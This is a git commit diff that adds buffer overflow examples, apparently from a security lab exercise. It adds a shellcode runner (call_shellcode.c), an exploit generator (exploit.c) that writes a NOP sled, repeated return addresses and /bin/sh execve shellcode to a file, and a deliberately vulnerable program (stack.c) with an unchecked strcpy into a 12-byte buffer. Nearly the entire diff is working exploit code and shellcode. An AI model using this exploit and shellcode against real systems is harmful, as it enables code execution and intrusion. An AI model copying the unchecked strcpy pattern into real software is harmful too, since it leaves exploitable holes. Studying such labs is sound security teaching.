adding buffer overflow examples

2024-11-24 20:03:02 +00:00 · 2021-03-18 14:10:55 -04:00 · 2021-03-18 14:10:55 -04:00 · 0f5a65b7a5
commit 0f5a65b7a5
parent 81da9ec76d
4 changed files with 128 additions and 0 deletions
--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@ -0,0 +1,3 @@
+{
+    "C_Cpp.errorSquiggles": "Disabled"
+}
--- a/buffer_overflow_example/demeter/call_shellcode.c
+++ b/buffer_overflow_example/demeter/call_shellcode.c
@ -0,0 +1,27 @@
+/* call_shellcode.c */
+
+/* This program will create a file containing code for launching a shell */
+
+#include <stdlib.h>
+#include <stdio.h>
+
+const char code[] =
+  "\x31\xc0"             /* xorl    %eax,%eax              */
+  "\x50"                 /* pushl   %eax                   */
+  "\x68""//sh"           /* pushl   $0x68732f2f            */
+  "\x68""/bin"           /* pushl   $0x6e69622f            */
+  "\x89\xe3"             /* movl    %esp,%ebx              */
+  "\x50"                 /* pushl   %eax                   */
+  "\x53"                 /* pushl   %ebx                   */
+  "\x89\xe1"             /* movl    %esp,%ecx              */
+  "\x99"                 /* cdq                            */
+  "\xb0\x0b"             /* movb    $0x0b,%al              */
+  "\xcd\x80"             /* int     $0x80                  */
+;
+
+int main(int argc, char **argv)
+{
+   char buf[sizeof(code)];
+   strcpy(buf, code);
+   ((void(*)( ))buf)( );
+} 
--- a/buffer_overflow_example/demeter/exploit.c
+++ b/buffer_overflow_example/demeter/exploit.c
@ -0,0 +1,69 @@
+//exploit.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#define DEFAULT_OFFSET 350 
+
+char code[]=
+"\x31\xc0" 
+"\x50" 
+"\x68""//sh" 
+"\x68""/bin" 
+"\x89\xe3" 
+"\x50" 
+"\x53" 
+"\x89\xe1"
+"\x99"
+"\xb0\x0b" 
+"\xcd\x80"
+;
+
+unsigned long get_sp(void)
+{
+     __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char **argv)
+{
+char buffer[517];
+FILE *badfile;
+char *ptr;
+long *a_ptr,ret;
+
+int offset = DEFAULT_OFFSET;
+int codeSize = sizeof(code);
+int buffSize = sizeof(buffer);
+
+if(argc > 1) offset = atoi(argv[1]); //this allows for command line input
+
+ptr=buffer;
+a_ptr = (long *) ptr;
+
+/* Initialize buffer with 0x90 (NOP instruction) */
+memset(buffer, 0x90, buffSize);
+
+//----------------------BEGIN FILL BUFFER----------------------\\
+
+ret = get_sp()+offset;
+    printf("Return Address: 0x%x\n",get_sp());
+    printf("Address: 0x%x\n",ret);
+
+ptr = buffer;
+    a_ptr = (long *) ptr;
+
+int i;
+for (i = 0; i < 300;i+=4)
+    *(a_ptr++) = ret;
+
+for(i = 486;i < codeSize + 486;++i)
+    buffer[i] = code[i-486];
+
+buffer[buffSize - 1] = '\0';
+//-----------------------END FILL BUFFER-----------------------\\
+
+
+/* Save the contents to the file "badfile" */
+badfile = fopen("./badfile", "w");
+fwrite(buffer,517,1,badfile);
+fclose(badfile);    
+}
--- a/buffer_overflow_example/demeter/stack.c
+++ b/buffer_overflow_example/demeter/stack.c
@ -0,0 +1,29 @@
+/* stack.c */
+
+/* This is the program that introduces the buffer overflow vulnerability. */
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+int bof(char *str)
+{
+    char buffer[12];
+
+    /* Can you spot the buffer overflow here? ;-) */ 
+    strcpy(buffer, str);
+
+    return 1;
+}
+
+int main(int argc, char **argv)
+{
+    char str[517];
+    FILE *badfile;
+
+    badfile = fopen("badfile", "r");
+    fread(str, sizeof(char), 517, badfile);
+    bof(str);
+
+    printf("Returned Properly\n");
+    return 1;
+}